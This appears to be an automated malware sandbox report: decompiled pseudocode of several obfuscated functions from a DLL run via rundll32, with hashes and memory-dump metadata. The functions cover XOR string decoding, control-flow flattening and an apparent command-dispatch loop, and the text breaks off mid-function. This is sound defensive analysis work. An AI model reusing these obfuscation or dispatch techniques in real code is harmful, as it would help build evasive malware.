0x1000377f
0x10003786
0x1000378d
0x10003794
0x1000379b
0x100037a2
0x100037a9
0x100037b0
0x100037b7
0x100037be
0x100037c5
0x100037c9
0x100037d0
0x100037d4
0x100037db
0x100037e2
0x100037e9
0x100037f0
0x100037f7
0x10003803
0x10003808
0x1000380d
0x10003814
0x1000381b
0x10003822
0x10003829
0x10003830
0x10003837
0x1000383e
0x10003845
0x1000384f
0x10003852
0x10003858
0x1000385b
0x10003862
0x10003873
0x10003873
0x10003877
0x00000000
0x00000000
0x1000386d
0x1000387b
0x1000386f
0x1000386f
0x10003871
0x10003872
0x00000000
0x10003872
0x1000387e
0x10003896
0x1000389d
0x100038b7
0x100038c1
0x100038d1
0x100038d2
0x00000000
0x100038d8
0x100038ab
0x100038b0
0x100038b5
0x00000000
0x00000000
0x100038e0
0x100038e0
0x00000000

Strings

,gB5, xrefs: 10003771

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,gB5
API String ID: 0-314899355
Opcode ID: 68a686b219e4400f96dd3d0f881fbb5fb260a2290e08df0bd638af8037ec20a9
Instruction ID: 599b554f9b892c03a3b64eb3f7a0b2b3f811accb1fb3e3cb2031a78a23ced8a0
Opcode Fuzzy Hash: 68a686b219e4400f96dd3d0f881fbb5fb260a2290e08df0bd638af8037ec20a9
Instruction Fuzzy Hash: 93416471C0070ADBEF1ACFA4C8465EEBBB5EF05354F208199D512B62A4CBB95B46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10003F0A, Relevance: 1.3, Strings: 1, Instructions: 89
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10003F0A(void* __ecx, void* __edx, void* __eflags) {
				void* _t42;
				signed int _t48;
				unsigned int* _t60;
				signed int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				unsigned int* _t77;
				signed int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_t80 =  *(_t92 + 0x18);
				_push(_t80);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t42);
				 *(_t92 + 0x18) = 0x7d0d;
				_t78 =  &(_t80[1]);
				 *(_t92 + 0x18) =  *(_t92 + 0x18) << 0xe;
				_t63 = 0x67;
				 *(_t92 + 0x18) =  *(_t92 + 0x18) * 0x1b;
				 *(_t92 + 0x18) =  *(_t92 + 0x18) / _t63;
				 *(_t92 + 0x18) =  *(_t92 + 0x18) ^ 0x00bd2c92;
				 *(_t92 + 0x28) = 0x60c2;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) + 0xfffffc96;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 1;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0xabcf9355;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0xabcffeb0;
				_t64 =  *_t80;
				_t79 =  &(_t78[1]);
				_t48 =  *_t78 ^ _t64;
				 *(_t92 + 0x1c) = _t64;
				 *(_t92 + 0x20) = _t48;
				_t27 = _t48 + 1; // 0xf
				_t82 =  !=  ? (_t27 & 0xfffffffc) + 4 : _t27;
				_t93 = _t92 + 8;
				_t60 = E1000A0AD(_t82,  *(_t92 + 0x18) % _t63);
				 *(_t93 + 0x20) = _t60;
				if(_t60 != 0) {
					_t90 = 0;
					_t77 = _t60;
					_t88 =  >  ? 0 :  &(_t79[_t82 >> 2]) - _t79 + 3 >> 2;
					if(_t88 != 0) {
						_t61 =  *(_t93 + 0x14);
						do {
							_t70 =  *_t79;
							_t79 =  &(_t79[1]);
							_t71 = _t70 ^ _t61;
							 *_t77 = _t71;
							_t77 =  &(_t77[1]);
							_t72 = _t71 >> 0x10;
							 *((char*)(_t77 - 3)) = _t71 >> 8;
							 *(_t77 - 2) = _t72;
							_t90 = _t90 + 1;
							 *((char*)(_t77 - 1)) = _t72 >> 8;
						} while (_t90 < _t88);
						_t60 =  *(_t93 + 0x20);
					}
					 *((char*)(_t60 +  *((intOrPtr*)(_t93 + 0x18)))) = 0;
				}
				return _t60;
			}

0x10003f0f
0x10003f14
0x10003f15
0x10003f16
0x10003f17
0x10003f1c
0x10003f24
0x10003f27
0x10003f35
0x10003f36
0x10003f40
0x10003f44
0x10003f4c
0x10003f54
0x10003f5c
0x10003f60
0x10003f68
0x10003f70
0x10003f74
0x10003f77
0x10003f79
0x10003f7d
0x10003f81
0x10003f91
0x10003f9c
0x10003fa6
0x10003fa8
0x10003faf
0x10003fb7
0x10003fb9
0x10003fca
0x10003fcf
0x10003fd1
0x10003fd5
0x10003fd5
0x10003fd7
0x10003fda
0x10003fdc
0x10003fe3
0x10003fe6
0x10003fe9
0x10003fec
0x10003ff2
0x10003ff3
0x10003ff6
0x10003ffa
0x10003ffa
0x10004003
0x10004003
0x1000400f

Strings

}, xrefs: 10003F1C

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: }
API String ID: 0-3670237491
Opcode ID: 5254b0bf0b904ba689c6c0ae5d2de66ac2549e1d576a0ae5edab4532bae23a23
Instruction ID: f273fb3651e453c3b746016cd7a59806210fe26b2f2cdcc6ab5d040bed42d19a
Opcode Fuzzy Hash: 5254b0bf0b904ba689c6c0ae5d2de66ac2549e1d576a0ae5edab4532bae23a23
Instruction Fuzzy Hash: 4431A072A083028FD314CF2CC48155BFBE1EFA8694F154A2DE589A7351D774EA48CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 1001894D, Relevance: 1.3, Strings: 1, Instructions: 62
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E1001894D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t55;
				intOrPtr _t65;
				signed int _t67;
				signed int _t68;
				intOrPtr* _t79;

				_t79 = _a8;
				_push(_t79);
				_push(_a4);
				_push(__ecx);
				E10017B8C(_t55);
				_v8 = 0xe0c2;
				_v8 = _v8 << 0x10;
				_t67 = 0x44;
				_v8 = _v8 * 0x41;
				_t68 = 0x6d;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x0040a3be;
				_a8 = 0x7a71;
				_a8 = _a8 ^ 0x5988afc4;
				_a8 = _a8 ^ 0xb9258551;
				_a8 = _a8 ^ 0xd2dc1d1f;
				_a8 = _a8 ^ 0x32716c24;
				_v16 = 0xe18d;
				_v16 = _v16 + 0xffff6a5e;
				_v16 = _v16 ^ 0x8c42fb0a;
				_v16 = _v16 ^ 0x8c42a668;
				_v12 = 0xaf70;
				_v12 = _v12 ^ 0x87f2b4a7;
				_v12 = _v12 / _t68;
				_v12 = _v12 * 0x2f;
				_v12 = _v12 ^ 0x3a9e3016;
				E1001160B(_v8,  *((intOrPtr*)(_t79 + 4)), _a8, __ecx);
				E1000E2FD( *((intOrPtr*)(__ecx + 8)), _v16,  *((intOrPtr*)(_t79 + 4)), _v12,  *_t79);
				_t65 =  *((intOrPtr*)(_t79 + 4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + _t65;
				return _t65;
			}

0x10018954
0x10018958
0x10018959
0x1001895f
0x10018960
0x10018965
0x1001896e
0x10018978
0x1001897b
0x10018983
0x10018984
0x10018989
0x10018990
0x10018997
0x1001899e
0x100189a5
0x100189ac
0x100189b3
0x100189ba
0x100189c1
0x100189c8
0x100189cf
0x100189d6
0x100189e3
0x100189ea
0x100189ed
0x100189fd
0x10018a10
0x10018a15
0x10018a1b
0x10018a23

Strings

$lq2, xrefs: 100189AC

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $lq2
API String ID: 0-2972371974
Opcode ID: 937e18654ce9cfee17fb576de1af0eaf00890edb1919500877a490a108165734
Instruction ID: 6cb571259fc4b1d01d7cf1b04405aaf10aafc1dbadc52372acc9bd06a02a7add
Opcode Fuzzy Hash: 937e18654ce9cfee17fb576de1af0eaf00890edb1919500877a490a108165734
Instruction Fuzzy Hash: 81210575D05208FFDB18CFA6C94688EBBB6EF84710F20C499E819AB260D774AB50DF40

Uniqueness

Uniqueness Score: -1.00%

Function 1001DD80, Relevance: .1, Instructions: 133
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E1001DD80(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				short _v80;
				char* _v84;
				char* _v88;
				signed int _v92;
				char _v96;
				char _v616;
				char _v1136;
				void* _t138;
				signed int _t163;
				signed int _t167;
				signed int _t168;
				void* _t169;
				void* _t186;

				_push(_a8);
				_t186 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t138);
				_v8 = 0x669;
				_v8 = _v8 + 0xffff2040;
				_t167 = 0x4a;
				_v8 = _v8 * 0x36;
				_v8 = _v8 * 0x18;
				_v8 = _v8 ^ 0xfbb3b791;
				_v32 = 0x8df4;
				_v32 = _v32 * 0x25;
				_v32 = _v32 ^ 0x00148250;
				_v16 = 0x16aa;
				_v16 = _v16 << 0xb;
				_v16 = _v16 + 0x694d;
				_v16 = _v16 + 0xffff1f06;
				_v16 = _v16 ^ 0x00b4d053;
				_v40 = 0xf7d2;
				_v40 = _v40 + 0xffff29fe;
				_v40 = _v40 + 0xffffd130;
				_v40 = _v40 ^ 0xffffcfbc;
				_v12 = 0x5114;
				_v12 = _v12 | 0x752588cf;
				_v12 = _v12 + 0x4617;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x1d49b30f;
				_v60 = 0xcd0c;
				_v60 = _v60 ^ 0x23a607af;
				_v60 = _v60 ^ 0x23a686af;
				_v28 = 0x250d;
				_v28 = _v28 * 0x49;
				_v28 = _v28 / _t167;
				_v28 = _v28 ^ 0x00002071;
				_v36 = 0xce91;
				_v36 = _v36 + 0xc567;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 ^ 0x00007052;
				_v44 = 0xe7bb;
				_v44 = _v44 + 0x3370;
				_v44 = _v44 ^ 0x0001513b;
				_v64 = 0xcf2;
				_t168 = 0x4d;
				_v64 = _v64 * 5;
				_v64 = _v64 ^ 0x00005f69;
				_v56 = 0xb8ef;
				_v56 = _v56 + 0xffffc1a4;
				_v56 = _v56 ^ 0x0000593f;
				_v24 = 0x704b;
				_v24 = _v24 / _t168;
				_v24 = _v24 << 5;
				_v24 = _v24 ^ 0x00006da4;
				_v48 = 0x2d4b;
				_v48 = _v48 + 0x36cc;
				_v48 = _v48 ^ 0x000049da;
				_v52 = 0x7d86;
				_v52 = _v52 << 0xb;
				_v52 = _v52 ^ 0x03ec0ffd;
				_v20 = 0xfef9;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 | 0x3e7c6f10;
				_v20 = _v20 ^ 0x3e7ee9b9;
				_push(_v12);
				_push(_v40);
				_t169 = 0x1e;
				E1001A68F(_t169,  &_v96);
				E1001A68F(0x208,  &_v616, _v60, _v28);
				E1001A68F(0x208,  &_v1136, _v36, _v44);
				E1001103F(_v64, _v56,  &_v616, _t186);
				E1001103F(_v24, _v48,  &_v1136, _a4);
				_v92 = _v8;
				_v88 =  &_v616;
				_v84 =  &_v1136;
				_v80 = _v16 | _v32;
				_t163 = E100083F8( &_v96, _v52, _v20);
				asm("sbb eax, eax");
				return  ~_t163 + 1;
			}

0x1001dd8a
0x1001dd8d
0x1001dd8f
0x1001dd92
0x1001dd93
0x1001dd94
0x1001dd99
0x1001dda2
0x1001ddaf
0x1001ddb2
0x1001ddb9
0x1001ddbc
0x1001ddc3
0x1001ddce
0x1001ddd7
0x1001ddde
0x1001dde5
0x1001dde9
0x1001ddf0
0x1001ddf7
0x1001ddfe
0x1001de05
0x1001de0c
0x1001de13
0x1001de1a
0x1001de21
0x1001de28
0x1001de2f
0x1001de33
0x1001de3a
0x1001de41
0x1001de48
0x1001de4f
0x1001de5a
0x1001de64
0x1001de67
0x1001de6e
0x1001de75
0x1001de7c
0x1001de80
0x1001de87
0x1001de8e
0x1001de95
0x1001de9c
0x1001dea7
0x1001dea8
0x1001deab
0x1001deb2
0x1001deb9
0x1001dec0
0x1001dec7
0x1001ded3
0x1001ded6
0x1001deda
0x1001dee1
0x1001dee8
0x1001deef
0x1001def6
0x1001defd
0x1001df01
0x1001df08
0x1001df13
0x1001df16
0x1001df1d
0x1001df24
0x1001df2a
0x1001df2f
0x1001df30
0x1001df46
0x1001df5c
0x1001df6f
0x1001df84
0x1001df8f
0x1001df98
0x1001dfa1
0x1001dfb0
0x1001dfb4
0x1001dfbe
0x1001dfc5

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e2b183595885b600878884a4008e472c3c51de15e127b8d0bf5cdf82f9a96e
Instruction ID: 5d7a9fffb95242584160f66818aa5cff2b8d023e59ebada24eac333bc26c2b05
Opcode Fuzzy Hash: c7e2b183595885b600878884a4008e472c3c51de15e127b8d0bf5cdf82f9a96e
Instruction Fuzzy Hash: CC61E0B1C0020EEBDF54CFA0D98A8DEBBB5FF44314F10815AE515BA2A0D7B95A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 10018489, Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10018489(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v64;
				void* _v76;
				intOrPtr _v80;
				char _v152;
				void* _t93;
				void* _t103;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t113;
				void* _t115;
				signed int _t121;
				void* _t146;
				void* _t147;
				void* _t149;
				void* _t150;

				_t150 = __eflags;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t93);
				_v80 = 0x2e43b2;
				asm("stosd");
				_t146 = 0;
				asm("stosd");
				_t121 = 0x7c;
				asm("stosd");
				_v36 = 0x5e78;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x000033c8;
				_v20 = 0xeb30;
				_v20 = _v20 + 0xdcff;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0xa250fe85;
				_v20 = _v20 ^ 0xa250a416;
				_v40 = 0xa124;
				_v40 = _v40 * 0x17;
				_v40 = _v40 ^ 0x000e0713;
				_v32 = 0x3dc3;
				_v32 = _v32 * 0x76;
				_v32 = _v32 ^ 0x001c1710;
				_v16 = 0xab7c;
				_v16 = _v16 ^ 0x6da702b8;
				_v16 = _v16 << 5;
				_v16 = _v16 | 0xcadb9840;
				_v16 = _v16 ^ 0xfeffa147;
				_v12 = 0xb51c;
				_v12 = _v12 + 0xffff8dfb;
				_v12 = _v12 | 0x3efde5ef;
				_v12 = _v12 ^ 0x3efdeb0e;
				_v28 = 0xe2c3;
				_v28 = _v28 + 0xffff53e5;
				_v28 = _v28 + 0x7c5;
				_v28 = _v28 + 0xffff2ba1;
				_v28 = _v28 ^ 0xffff0b3f;
				_v24 = 0xa8a9;
				_v24 = _v24 + 0xffff4df1;
				_v24 = _v24 ^ 0x156a9c21;
				_v24 = _v24 * 0x66;
				_v24 = _v24 ^ 0x7788af50;
				E1001BC32( &_v152, _v36, _a4, _v20, _v40);
				_t149 = _t147 + 0x18;
				L15:
				_t103 = E1001B399( &_v64, _v32, _t150, _v16,  &_v152, _v12);
				_t149 = _t149 + 0xc;
				if(_t103 != 0) {
					__eflags = E1000E8F6(_v28,  &_v64,  &_v56, _v24);
					if(__eflags != 0) {
						_t107 = _v52 - 1;
						__eflags = _t107;
						if(_t107 == 0) {
							E1000E42E(_v56,  &_v48);
						} else {
							_t109 = _t107 - 1;
							__eflags = _t109;
							if(_t109 == 0) {
								E1001732F(_v56,  &_v48);
							} else {
								_t111 = _t109 - 1;
								__eflags = _t111;
								if(_t111 == 0) {
									E1001C1C2(_v56,  &_v48);
								} else {
									_t113 = _t111 - 1;
									__eflags = _t113;
									if(_t113 == 0) {
										E1001539F(_v56,  &_v48);
									} else {
										_t115 = _t113 - 6;
										__eflags = _t115;
										if(_t115 == 0) {
											E10010082(_v56,  &_v48);
										} else {
											__eflags = _t115 == 1;
											if(_t115 == 1) {
												E1000A82A(_v56,  &_v48);
											}
										}
									}
								}
							}
						}
						_t146 = _t146 + 1;
						__eflags = _t146;
					}
					goto L15;
				}
				return _t146;
			}

0x10018489
0x10018494
0x10018497
0x10018498
0x10018499
0x1001849e
0x100184ad
0x100184b0
0x100184b4
0x100184b5
0x100184b6
0x100184b7
0x100184c9
0x100184cc
0x100184d3
0x100184da
0x100184e1
0x100184e5
0x100184ec
0x100184f3
0x100184fe
0x10018501
0x10018508
0x10018513
0x10018516
0x1001851d
0x10018524
0x1001852b
0x1001852f
0x10018536
0x1001853d
0x10018544
0x1001854b
0x10018552
0x10018559
0x10018560
0x10018567
0x1001856e
0x10018575
0x1001857c
0x10018583
0x1001858a
0x10018595
0x10018598
0x100185ab
0x100185b0
0x10018631
0x10018644
0x10018649
0x1001864e
0x100185c9
0x100185cb
0x100185d0
0x100185d0
0x100185d1
0x1001862b
0x100185d3
0x100185d3
0x100185d3
0x100185d4
0x1001861e
0x100185d6
0x100185d6
0x100185d6
0x100185d7
0x10018611
0x100185d9
0x100185d9
0x100185d9
0x100185da
0x10018604
0x100185dc
0x100185dc
0x100185dc
0x100185df
0x100185f7
0x100185e1
0x100185e1
0x100185e2
0x100185ea
0x100185ea
0x100185e2
0x100185df
0x100185da
0x100185d7
0x100185d4
0x10018630
0x10018630
0x10018630
0x00000000
0x100185cb
0x1001865b

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0796a24d570bf65319b0d2d9e6296b4b4ef0cc5c553f3067dd5e605f41e1bd1d
Instruction ID: b5a541104541c12edcc2babf3f78d7fc7acaa365d66759c061343b9b6c66ca37
Opcode Fuzzy Hash: 0796a24d570bf65319b0d2d9e6296b4b4ef0cc5c553f3067dd5e605f41e1bd1d
Instruction Fuzzy Hash: F0516731D0020E9BDF14CFA4D9458EEBBB2FF44344F208519E915BA1A0E7B4AB49CF91

Uniqueness

Uniqueness Score: -1.00%

Function 100048C7, Relevance: .1, Instructions: 120
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E100048C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t97;
				void* _t101;
				void* _t103;
				intOrPtr _t118;
				signed int _t119;
				signed int _t120;
				signed int* _t123;

				_push(_a16);
				_t117 = _a4;
				_t101 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t88);
				_v88 = 0x3e47c6;
				_t118 = 0;
				_v84 = 0x2e85c;
				_t123 =  &(( &_v124)[6]);
				_v80 = 0;
				_v116 = 0xeb1;
				_t103 = 0x18ef13d0;
				_v116 = _v116 | 0x681e4c0f;
				_v116 = _v116 + 0x9c82;
				_v116 = _v116 ^ 0x681ed0c4;
				_v100 = 0x2fdf;
				_t119 = 0x1d;
				_v100 = _v100 * 0x73;
				_v100 = _v100 ^ 0x0015806f;
				_v104 = 0xd96a;
				_v104 = _v104 + 0xffff9e84;
				_v104 = _v104 ^ 0x00000479;
				_v120 = 0x7319;
				_v120 = _v120 + 0xffff5d1c;
				_v120 = _v120 ^ 0x9587ac3b;
				_v120 = _v120 + 0xffffbf4d;
				_v120 = _v120 ^ 0x6a78098b;
				_v124 = 0xd4eb;
				_v124 = _v124 >> 0xb;
				_v124 = _v124 ^ 0xe07fef21;
				_v124 = _v124 + 0xffff4923;
				_v124 = _v124 ^ 0xe07f0e32;
				_v112 = 0xccdd;
				_v112 = _v112 / _t119;
				_t120 = 0x63;
				_v112 = _v112 * 0x4a;
				_v112 = _v112 ^ 0x000220ef;
				_v92 = 0x9fa6;
				_v92 = _v92 / _t120;
				_v92 = _v92 ^ 0x000066f2;
				_v108 = 0xad69;
				_v108 = _v108 + 0xffffdb87;
				_v108 = _v108 | 0x4e43039c;
				_v108 = _v108 ^ 0x4e43a39d;
				_v96 = 0x1615;
				_v96 = _v96 >> 5;
				_v96 = _v96 ^ 0x000066fa;
				do {
					while(_t103 != 0x116e962) {
						if(_t103 == 0x18ef13d0) {
							_t103 = 0x24e7eace;
							continue;
						} else {
							if(_t103 == 0x1c2d9c12) {
								__eflags = E1000D502(_t117 + 8,  &_v76, _v92, _v108, _v96);
								_t118 =  !=  ? 1 : _t118;
							} else {
								if(_t103 != 0x24e7eace) {
									goto L10;
								} else {
									E1001BC32( &_v76, _v116, _t101, _v100, _v104);
									_t123 =  &(_t123[3]);
									_t103 = 0x116e962;
									continue;
								}
							}
						}
						L13:
						return _t118;
					}
					_t97 = E1001B399(_t117, _v120, __eflags, _v124,  &_v76, _v112);
					_t123 =  &(_t123[3]);
					__eflags = _t97;
					if(__eflags == 0) {
						_t103 = 0xc57011b;
						goto L10;
					} else {
						_t103 = 0x1c2d9c12;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t103 - 0xc57011b;
				} while (__eflags != 0);
				goto L13;
			}

0x100048ce
0x100048d5
0x100048dc
0x100048de
0x100048e5
0x100048ec
0x100048ed
0x100048ee
0x100048ef
0x100048f4
0x100048fc
0x100048fe
0x10004906
0x10004909
0x1000490f
0x10004917
0x1000491c
0x10004924
0x1000492c
0x10004934
0x10004943
0x10004946
0x1000494a
0x10004952
0x1000495a
0x10004962
0x1000496a
0x10004972
0x1000497a
0x10004982
0x1000498a
0x10004992
0x1000499a
0x1000499f
0x100049a7
0x100049af
0x100049b7
0x100049c7
0x100049d0
0x100049d1
0x100049d5
0x100049dd
0x100049f0
0x100049f4
0x100049fc
0x10004a04
0x10004a0c
0x10004a14
0x10004a1c
0x10004a24
0x10004a29
0x10004a31
0x10004a31
0x10004a3f
0x10004a6d
0x00000000
0x10004a41
0x10004a43
0x10004ac4
0x10004ac6
0x10004a45
0x10004a4b
0x00000000
0x10004a4d
0x10004a5e
0x10004a63
0x10004a66
0x00000000
0x10004a66
0x10004a4b
0x10004a43
0x10004aca
0x10004ad2
0x10004ad2
0x10004a87
0x10004a8c
0x10004a8f
0x10004a91
0x10004a97
0x00000000
0x10004a93
0x10004a93
0x00000000
0x10004a93
0x00000000
0x10004a9c
0x10004a9c
0x10004a9c
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67e62cccba0795b3f698259be2eeecdd67942647a4c0cc2f68250543a850406
Instruction ID: 0064522b2a55c9b0fe66d7c9d43482d506029630d0cd537675ac405d163394dc
Opcode Fuzzy Hash: a67e62cccba0795b3f698259be2eeecdd67942647a4c0cc2f68250543a850406
Instruction Fuzzy Hash: D6518BB16083429BE314CF21C88591FBBE1FBC8388F114A1DF4CA66261D775CA498F8B

Uniqueness

Uniqueness Score: -1.00%

Function 10018A24, Relevance: .1, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E10018A24(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _t90;
				void* _t99;
				void* _t104;
				signed int _t106;
				intOrPtr _t116;

				_t104 = __edx;
				_push(0x104);
				_push(_a16);
				_v44 = 0x104;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t90);
				_v52 = 0x58c63;
				_t116 = 0;
				_v48 = 0;
				_v12 = 0xbb85;
				_t106 = 0xa;
				_v12 = _v12 * 0x1a;
				_v12 = _v12 << 6;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x5c100889;
				_v8 = 0xb760;
				_v8 = _v8 + 0x3459;
				_v8 = _v8 + 0xffffeb53;
				_v8 = _v8 * 0x5e;
				_v8 = _v8 ^ 0x004ee21f;
				_v28 = 0x78d9;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x2afc8b5f;
				_v28 = _v28 ^ 0x2afcc95e;
				_v40 = 0xa9cb;
				_v40 = _v40 * 0x36;
				_v40 = _v40 ^ 0x0023ff0f;
				_v24 = 0x104;
				_v24 = _v24 >> 3;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000039b9;
				_v20 = 0x4873;
				_v20 = _v20 ^ 0x560753eb;
				_v20 = _v20 >> 4;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000074e0;
				_v16 = 0x92dd;
				_v16 = _v16 | 0x8567884b;
				_v16 = _v16 ^ 0x94f2a807;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0xca995901;
				_v32 = 0x92e4;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 / _t106;
				_v32 = _v32 ^ 0x00001cb5;
				_v36 = 0xcc25;
				_v36 = _v36 + 0x4a18;
				_v36 = _v36 ^ 0x0001063d;
				_t99 = E1001965E(_a16, _v36);
				_t115 = _t99;
				if(_t99 != 0) {
					_t116 = E10001E35(_v28, _t115,  &_v44, _t104, _t106, _v40, _v24);
					E1000ADFC(_v20, _v16, _t115, _v32);
				}
				return _t116;
			}

0x10018a2d
0x10018a34
0x10018a35
0x10018a38
0x10018a3b
0x10018a3e
0x10018a41
0x10018a44
0x10018a45
0x10018a46
0x10018a4b
0x10018a52
0x10018a54
0x10018a57
0x10018a64
0x10018a68
0x10018a6b
0x10018a6f
0x10018a73
0x10018a7a
0x10018a81
0x10018a88
0x10018a93
0x10018a96
0x10018a9d
0x10018aa4
0x10018aa8
0x10018aaf
0x10018ab6
0x10018ac1
0x10018ac4
0x10018acb
0x10018ad0
0x10018ad4
0x10018ad8
0x10018adf
0x10018ae6
0x10018aed
0x10018af1
0x10018af5
0x10018afc
0x10018b03
0x10018b0a
0x10018b11
0x10018b15
0x10018b1c
0x10018b23
0x10018b2c
0x10018b2f
0x10018b36
0x10018b3d
0x10018b44
0x10018b57
0x10018b5c
0x10018b63
0x10018b81
0x10018b87
0x10018b8c
0x10018b97

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5d3344d0a2e917cacd8248694e89e02b1c84ccc32102f68cf3e68d931eae67
Instruction ID: 665d8e484694ccbf0d546d0a8051abc553762a5423e5502d86f3874b40546d65
Opcode Fuzzy Hash: ab5d3344d0a2e917cacd8248694e89e02b1c84ccc32102f68cf3e68d931eae67
Instruction Fuzzy Hash: 824122B1C0020EABDF09CFE5C98A4EEFBB5FB44304F208149E515B6264D3B95A55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001A2E5, Relevance: .1, Instructions: 91
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1001A2E5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t98;
				signed int _t115;
				void* _t123;
				signed int _t124;
				void* _t127;

